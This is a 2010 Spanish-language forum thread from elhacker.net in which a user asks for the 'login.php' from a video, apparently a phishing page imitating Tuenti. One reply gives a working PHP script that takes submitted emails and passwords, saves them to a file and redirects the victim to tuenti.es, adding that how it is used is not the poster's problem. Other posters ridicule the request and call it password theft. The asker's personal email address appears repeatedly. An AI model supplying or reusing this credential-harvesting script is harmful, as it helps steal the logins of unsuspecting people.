elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Necesito un poco de ayuda de como hacer un login.php
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Necesito un poco de ayuda de como hacer un login.php  (Leído 4,361 veces)
niyO87

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Necesito un poco de ayuda de como hacer un login.php
« en: 10 Junio 2010, 02:47 am »

buenas, e visto este video en internet http://www.youtube.com/watch?v=uunki-SNBFw y me gustaria saber hacer lo que hace este individuo... en el minuto 2.45 dice algo del script en php, es lo unico que me falla para poder lograr hacerlo... alguien con un tanto de paciencia me dice como se hace¿? tengo varios programas bajados como Dreamweaver8 Teleport_Ultra_1.60 y de estos tipos pero no consigo hacer que funcione mi login :-( prometo no usarlo para mal de nada ni nadie... pero es urgente, gracias de antemano. Mi e-mail: niyo_mago87@hotmail.com


En línea

Fischer987

Desconectado Desconectado

Mensajes: 183


El ajedrez es la "vida".


Ver Perfil
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #1 en: 10 Junio 2010, 03:37 am »

Así que prometes no usarlo para el mal eh.... jajajaja

Bueno, he mirado el vídeo y está tiradísimo de hacer... ahora bien, yo personalmente no me creo que lo vayas a utilizar para el bien ni para aumentar la seguridad de tu PC.

Pero como aquí somos buenas personas, te voy a ayudar y te voy a decir lo que tienes que hacer:

mira bien el vídeo y escucha atentamente todo lo que viene a partir del minuto 2:05, cláramente te dice algo muy importante sobre tu duda y también convendría que leyeses los comentarios que deja la gente del video y lo que pone la misma persona que ha colgado el vídeo.

Tienes que aprender a fijarte mejor en las cosas, y no ser tan impaciente, y sería mucho más útil que aprendieses qué está haciendo esa persona en vez de seguir sus pasos sin saber qué estás toqueteando...

Saludos...


En línea

niyO87

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #2 en: 10 Junio 2010, 22:29 pm »

gracias por tu aportacion pero por desgracia no me es de ayuda... en el minuto que me dices lo que hace es modificar el index, no crea el login.php que es lo que yo no se hacer... en el 2.50 como bien e dicho antes... comenta que falta el script, eso exactamente es lo que nose hacer, me es urgente y si tan sencillo es porfavor ayudenme grax  ;)
En línea

‭lipman


Desconectado Desconectado

Mensajes: 3.062



Ver Perfil WWW
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #3 en: 11 Junio 2010, 11:58 am »

En el propio video te dice que tienes que contactar con él para que te mande el script del login.php
En línea

sergiosaw

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #4 en: 12 Junio 2010, 00:48 am »

Este es tu codigo:


<?php
$emai=$_POST['email'];
$passwor=$_POST['input_password'];
$archivo=fopen('aqui tu archivo',a);
fwrite($archivo,"Usuario: ".$emai." ...... Contraseña: " .$passwor." ");
fclose($archivo);
echo "<meta http-equiv='Refresh' content='1;url=http://www.tuenti.es'>";
?>



Como lo uses ya no es mi problema
En línea

niyO87

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #5 en: 12 Junio 2010, 07:10 am »

... haber... quizas parezca tonto, pero enserio que no lo soy... el video lo e visto entero desde el principio hasta el final varias veces... y se lo que dice y lo que no, os agradezco enormemente vuestras aportaciones, pero si realmente me vais a decir nada, prefiero que no me digais nada de verdad  :¬¬, nose si me explico ^^ de verda os lo agradezco, pero necesito ayuda, ayuda real, no que me digan lo que sale en el video  :rolleyes: si de verdad alguien sabe del tema agradeceria su ayuda e incluso pagaria... el dinero no me llega a importar en absoluto, mientras se me ayude de verdad, para los interesados mi e-mail es niyo_mago87@hotmail.com el caso se trata de que quiero saber EXACTAMENTE como hacer lo que sale en el video, SOLO ESO  :rolleyes:
En línea

bomba1990


Desconectado Desconectado

Mensajes: 395



Ver Perfil WWW
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #6 en: 12 Junio 2010, 08:01 am »

creo que gente como tu que solo posee 3 mensajes y que viene a este foro solo a buscar como ser mas lammer y con esa actitud tan poco adecuada, deberias ser mas humilde. No soy quien para decirte esto, pero creo que deberias ir a buscar ayuda en otro lado(como un psicologo)

ademas ya te an respondido tu pregunta, tanto en el video(que menos mal que lo as visto tantas veces que no sabes ni que dice) y un usuario aqui ya tambien te lo a respondido.


 :silbar:  :silbar:  :silbar:

ademas las normas del foro dicen esto:
Citar
Aqui queremos programar, no instalar scripts. Esto va por muchos posts de autores que quieren resolver problemas que surjen al instalar un foro o un CMS
« Última modificación: 12 Junio 2010, 08:03 am por bomba1990 » En línea

"Cuando le di de comer a los pobres me llamaron santo, pero cuando pregunte porque los pobres eran pobres me dijeron comunista"

http://sosinformatico.blogspot.com/
http://www.publisnet.com.ve
awesome13

Desconectado Desconectado

Mensajes: 195



Ver Perfil
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #7 en: 12 Junio 2010, 09:45 am »

Pues yo lo e hecho POR PROBAR y a mi si que me funciona.
En línea

Que le dice un .gift a un .jpeg? ....Animate hombre!!!
sergiosaw

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #8 en: 12 Junio 2010, 13:20 pm »

... haber... quizas parezca tonto, pero enserio que no lo soy... el video lo e visto entero desde el principio hasta el final varias veces... y se lo que dice y lo que no, os agradezco enormemente vuestras aportaciones, pero si realmente me vais a decir nada, prefiero que no me digais nada de verdad  :¬¬, nose si me explico ^^ de verda os lo agradezco, pero necesito ayuda, ayuda real, no que me digan lo que sale en el video  :rolleyes: si de verdad alguien sabe del tema agradeceria su ayuda e incluso pagaria... el dinero no me llega a importar en absoluto, mientras se me ayude de verdad, para los interesados mi e-mail es niyo_mago87@hotmail.com el caso se trata de que quiero saber EXACTAMENTE como hacer lo que sale en el video, SOLO ESO  :rolleyes:


omg pero si te pasado el codigo que funciona perfectamente, aunque viendo tu ignorancia quizas no deberia haberlo hecho

saludos
« Última modificación: 12 Junio 2010, 13:22 pm por sergiosaw » En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Necesito un poco de ayuda de como hacer un login.php
« Respuesta #9 en: 12 Junio 2010, 20:23 pm »

No entiendo la gracia de robar contraseñas con esto, y mas encima te enojas? Por lo menos leete un manual básico para que entiendas que es lo que haces y no pongas tu correo que va contra las normas además de que muchos lammers los recolectan para enviar spam xD
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
necesito ayuda sobre como hacer un hackin « 1 2 »
Dudas Generales
lord_dracko 13 5,590 Último mensaje 28 Febrero 2013, 11:23 am
por lord_dracko
Cómo hacer login en Windows 10 si el teclado no funciona
Noticias
wolfbcn 0 1,262 Último mensaje 4 Octubre 2017, 01:59 am
por wolfbcn
ayuda necesito descifrar la contraseña de login data de chrome
Dudas Generales
thorragnarok 0 1,943 Último mensaje 21 Noviembre 2023, 23:23 pm
por thorragnarok
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines